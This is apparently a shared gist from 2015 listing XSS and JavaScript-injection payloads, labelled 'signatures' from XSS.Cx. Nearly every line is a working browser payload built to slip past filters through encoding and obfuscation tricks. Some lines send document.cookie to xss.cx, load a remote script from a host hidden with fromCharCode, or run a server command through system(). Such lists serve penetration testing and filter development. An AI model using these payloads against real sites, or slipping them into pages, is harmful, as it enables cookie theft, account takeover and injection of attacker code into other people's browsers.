Created
February 1, 2015 02:03
XSS (Cross-Site Scripting) and JavaScript Injection Signatures from XSS.Cx
'() {' | |
document.createElement('img').src='javascript:while(1){}' | |
'<'s'v'g' o'n'l'o'a'd'='a'l'e'r't'('7')' '>' | |
(function(a){alert(1)}).call() | |
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)}} | |
p'rompt(1) | |
"(prompt(1))in" | |
parseInt("prompt",36); | |
eval((1558153217).toString(36).concat(String.fromCharCode(40)).concat(1).concat(String.fromCharCode(41))) | |
eval(1558153217..toString(36))(1) | |
eval(630038579..toString(30))(1) | |
eval(0x258da033.toString(30))(1) | |
for((i)in(self))eval(i)(1) | |
{"source":{},"__proto__":{"source":"$`onerror=prompt(1)>"}} | |
//prompt.ml%2f@ᄒ.ws/✌ | |
//prompt.ml%2f@⒕₨ | |
javascript:prompt(1)#{"action":1} | |
vbscript:prompt(1)#{"action":1} | |
window.location.assign("http://xss.cx") | |
window.name='a\x01b' | |
window.name='hacked';location.replace('about:blank'); | |
window.name="javascript:confirm((window.opener||window).document.cookie);"; | |
window.open("http://xss.cx","confirm(document.domain);", "", false); | |
vbscr	ipt:confirm(1)" | |
vbscript:confirm(1); | |
vbscript:confirm(1); | |
{{{}.toString.constructor('confirm(1)')()}} | |
try{confirm(document.domain)}catch(e){location.reload()} | |
\u003C | |
\u003E | |
\u003c | |
\u003cscript\u003econfirm(\u0027XSS\u0027)\u003c/script\u003e | |
\u003e | |
\u0061lert(1) | |
\u0061\u006c\u0065\u0072\u0074 | |
\u0061\u006c\u0065\u0072\u0074(1) | |
%ufflcxss%2f%uffle | |
this["ownerDocu"+"ment"]["loca"+"tion"]=”//google.com” | |
throw delete~typeof~confirm(1)/ | |
data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4= | |
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== | |
data:text/html,<script>confirm(0);confirm(1);location.reload();</script> | |
.__defineGetter__.constructor('[].constructor. | |
defineSetter('x',confirm); x=1; | |
delete [a=confirm],delete a(1) | |
delete confirm(1) | |
delete~[a=confirm]/delete a(1) | |
var a=0; ((a == 1) ? 2 : confirm(1));// | |
null%22%20style%3d%22background%3aexpression%28confirm%282727%29 | |
";document.body.addEventListener("DOMActivate",confirm(1))// | |
delete~[a=confirm]/delete a(1) | |
(0)['constructor']['constructor']("\141\154\145\162\164(1)")(); | |
javascript:confirm&lpar1&rpar | |
" onfocus="write(unescape('<')+'script src='+unescape('"http://') | |
' onmouseover=confirm(document.location) | |
(0)['constructor']['constructor']("\141\154\145\162\164(1)")(); | |
{1+1,confirm(8)} | |
<blink/ onmouseover=prompt(1)>OnMouseOver | |
({})[$='\143\157\156\163\164\162\165\143\164\157\162'][$]('\141\154\145\162\164\50/ 12345 /\51')() | |
1/confirm(1) | |
"1\"&confirm(1)\"3" | |
>%22%27><img%20src%3d%22javascript:confirm(%27%20XSS%27)%22>'%uff1cscript%uff1econfirm('XSS')%uff1c/script%uff1e'">>"'';!--"<XSS>=&{()} | |
\%22}%29%29%29}catch%28e%29{confirm%28document.domain%29;}// | |
'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Exss(0x000045)%3C/script%3E | |
\%22;confirm(1);// | |
\%22))}catch(e){}if(!self.a)self.a=!confirm(document.cookie)// | |
Event.prototype[0]='@garethheyes',Event.prototype.length=1;Event.prototype.toString=[].join;onload=confirm | |
ExternalInterface.call("document.write","<script>confirm(1)</script>"); | |
ExternalInterface.call("eval","myWindow=window.open('','','width=200,height=100'); myWindow.document.write(\"<html><head><script src=\'http://xss.cx/xss.js\'></script></head><body>hi</body></html>\");myWindow.focus()"); | |
JaVaScRipT:confirm(1) | |
String.fromCharCode(0xffff+0x3d) | |
(String.fromCharCode(97,108,101,114,116,40,39,104,105,39,41)) | |
[U+2028]confirm(1) | |
'-/"/-confirm(1)//' | |
+confirm(1) | |
+confirm(1)-- | |
-confirm(1)- | |
\";confirm(1);// | |
“;confirm(1)// | |
confirm(1)".replace(/.+/,eval)// | |
confirm(1)>>>/xss | |
'+confirm(9)&&null==' | |
';confirm(String.fromCharCode(88,83,83))//';confirm(String.fromCharCode(88,83,83))//"; | |
confirm(String.fromCharCode(88,83,83))//";confirm(String.fromCharCode(88,83,83))//-- | |
';confirm(String.fromCharCode(88,83,83))//';confirm(String.fromCharCode(88,83,83))//";confirm(String.fromCharCode(88,83,83))//";confirm(String.fromCharCode(88,83,83))//--</SCRIPT>">'><SCRIPT>confirm(String.fromCharCode(88,83,83))</SCRIPT> | |
';confirm(String.fromCharCode(88,83,83))//\';confirm(String.fromCharCode(88,83,83))//";confirm(String.fromCharCode(88,83,83))//\";confirm(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>confirm(String.fromCharCode(88,83,83))</SCRIPT>=&{} | |
\";confirm(document.location);// | |
confirm(document.location) | |
confirm(document.selection.createRange().getBookmark()) | |
confirm(location.hostname) | |
confirm(window.toStaticHTML('<base href="http://xss.cx/"></base>')); | |
confirm(window.toStaticHTML('<label style="overflow:hidden;background:red;display:block;width:4000px;height:4000px;position:absolute;top:0px;left:0px;" for="submit">Click')); | |
confirm(window.toStaticHTML('<marquee>foo</marquee>')); | |
confirm(<xss>xs{[function::status]}s</xss>) | |
%c0″//(0000%0dconfirm(1)// | |
;\"))}catch(e) {confirm(document.location);}// | |
;\\"))}catch(e) {confirm(document.location);}// | |
\"));}catch(e){confirm(document.domain);}// | |
\"));}catch(e){confirm(document.domain)}// | |
\"));}catch(e){x=window.open('http://xss.cx/');setTimeout('confirm(x.document.body.innerText)',4000)}// | |
";document.body.addEventListener("DOMActivate",confirm(1))// | |
document.body.innerHTML=('<\000\0i\000mg src=xx:x onerror=confirm(1)>') | |
"+document.cookie+" | |
document.cookie='xss=xss;domain=.cx.' | |
document.getElementsByName("login").item(0).src = http://xss.cx/ | |
document.location="http://xss.cx/default.aspx?c=" + document.cookie | |
'},document.location=window.name+'//'+ | |
document.location=window.name+'//'+ | |
document.location=window.name%2b%27//%27%2b | |
document.write('<ı onclıck=alert(1)>asd</ı>'.toUpperCase() | |
document.write('<img src="<iframe/onload=confirm(1)>\0">') | |
";escape=eval;// | |
eval(location.hash.slice(1)) | |
eval(location.hash.slice(1))// | |
");eval(name+" | |
"+eval(name)+" | |
eval(name) | |
eval('\\u'+'0061'+'lert(1)') | |
getURL("javascript:confirm(document.location)") | |
header('Refresh: 0;url=javascript:confirm(1)'); | |
htmlStr = '<a href="'+*dataentities*+'javascript:123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; | |
htmlStr = '<a href="javascript'+*dataentities*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; | |
htmlStr = '<a href="javascript'+*dataentities*+':123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; | |
if(1)confirm(1)}{ | |
javaSCRIPT:confirm(1) | |
javas	cript:\u0061lert(1); | |
javascript:confirm(1) | |
javascript:confirm(1) | |
"javascript:confirm(0);", | |
;javascript:confirm(0); | |
;})javascript:confirm(0); | |
javascript:confirm(0); | |
javascript:confirm(1)// | |
javascript:prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x | |
"javascript:prompt(/compaXSS/.source);var x = prompt;x(0);x(/XSS/.source);x" | |
/"/_javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x | |
javascript:\u0061lert(1) | |
javascript:confirm(document.cookie) | |
location='vbscript:alert(1)' | |
(location.hash){eval(location.hash.slice(1))}else{confirm(document.location)}//<img src="x:x" onerror="if(location.hash){eval(location.hash.slice(1))}else{confirm(document.location)}"> | |
';location='javascript://'%2Blocation.hash;' | |
location='javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c %75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34(1)' | |
location='javascript:%61%6c%65%72%74%28%31%29' | |
location=javascript:confirm(0);. | |
";location=name;// | |
\nconfirm(1) | |
navigateToURL(new URLRequest("Javascript: document.write(\"<script>confirm(1)</scr\"+\"ipt>\")"),"_self") | |
new XMLHttpRequest().open("GET", "data:text/html,<svg onload=confirm(2)></svg>", false); | |
;onerror=confirm;throw 1; | |
onerror=confirm;throw 1; | |
onerror=confirm;throw 1; | |
onerror=eval;throw'=confirm\x281\x29'; | |
onerror=eval;throw'=confirm\x281\x29'; | |
"onload="a=document.createElement('script');a.setAttribute('src',String.fromCharCode(104,116,116,112,58,47,47,109,97,108,101,114,105,115,99,104,46,110,101,116,47,97,46,106,115));document.body.appendChild(a) | |
onload=confirm(1)// | |
prompt(0x0064) | |
;prompt(1)//”;prompt(2)//”;prompt(3)//–></SCRIPT>”>’><SCRIPT>prompt(4)</SCRIPT> | |
"!=prompt(9)!=" | |
"*prompt(9)*" | |
"-prompt(9)-" | |
"/prompt(9)/" | |
"<<prompt(9)<<" | |
"<=prompt(9)<=" | |
"<prompt(9)<" | |
"===prompt(9)===" | |
"==prompt(9)==" | |
">=prompt(9)>=" | |
">>>prompt(9)>>>" | |
">>prompt(9)>>" | |
">prompt(9)>" | |
"?prompt(9):" | |
"^prompt(9)^" | |
"|prompt(9)|" | |
"||prompt(9)||" | |
prompt(9) | |
prompt(location.hash) | |
prototype.join=function(){confirm("PWND:"+document.body.innerHTML)}')(); | |
j
a
vas
cript:confirm(1); | |
parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm" | |
prompt(1)-eval(JSON.parse(name).input) | |
javascript:HTMLDocument.__proto__.__defineSetter__("prototype",function(){try{d.d.d}catch(e){confirm(e.stack)}}) | |
confirm`1`; var something = `abc${confirm(1)}def`; ``.constructor.constructor`confirm\`1\````; | |
'"()=<z> | |
'"(){}[]; | |
JaVAscRIPT:confirm(4) | |
[XSS](javascript:confirm(6)) | |
(javascript:window.onerror=confirm;throw%20document.cookie) | |
0\%22))}catch(e){confirm(2)}// | |
Components.lookupMethod(self, 'confirm')(1) | |
Data URl | |
"; ||confirm('XSS') || " | |
'';!--"<XSS>=&{()} | |
'';!--"<XSS>=&{()} | |
5.replace(/XSS/g,confirm) | |
";a.b=c;// | |
";a[b]=c;// | |
a="get"; | |
$("button").val("<iframe src=vbscript:confirm(1)>") | |
external.NavigateAndFind('http://xss.cx',[],[]) | |
javascript	:alert(1) | |
javascript<TAB>:alert(1) | |
{{toString.constructor.prototype.toString=toString.constructor.prototype.call%3b[%22a%22,%22alert(1)%22].sort(toString.constructor)}} | |
${@print(system(“dir”))} | |
{{m=[({}).constructor.defineProperties];[[''.toString.constructor,{'constructor':{} }].reduce(m[0])];''.toString.constructor('alert(1)')()}} | |
Function.prototype.toString=Function.prototype.call;"alert(1)//".replace("//",Function) | |
top[630038579..toString(30)](1) | |
*/(URL[%26quot;\142\151\147%26quot;][%26quot;\143\157\156\163\164\162\165\143\164\157\162%26quot;](%26quot;\141\154\145\162\164\75\141\154\145\162\164\50\61\51%26quot;)())'%3E%3C%%20style='x:expression/* | |
\u{61}l\u{65}rt`1` | |
Object.prototype[Symbol.toStringTag]='<svg/onload=alert(1)>'; | |
while(1){} | |
location='javascript:1+{}' |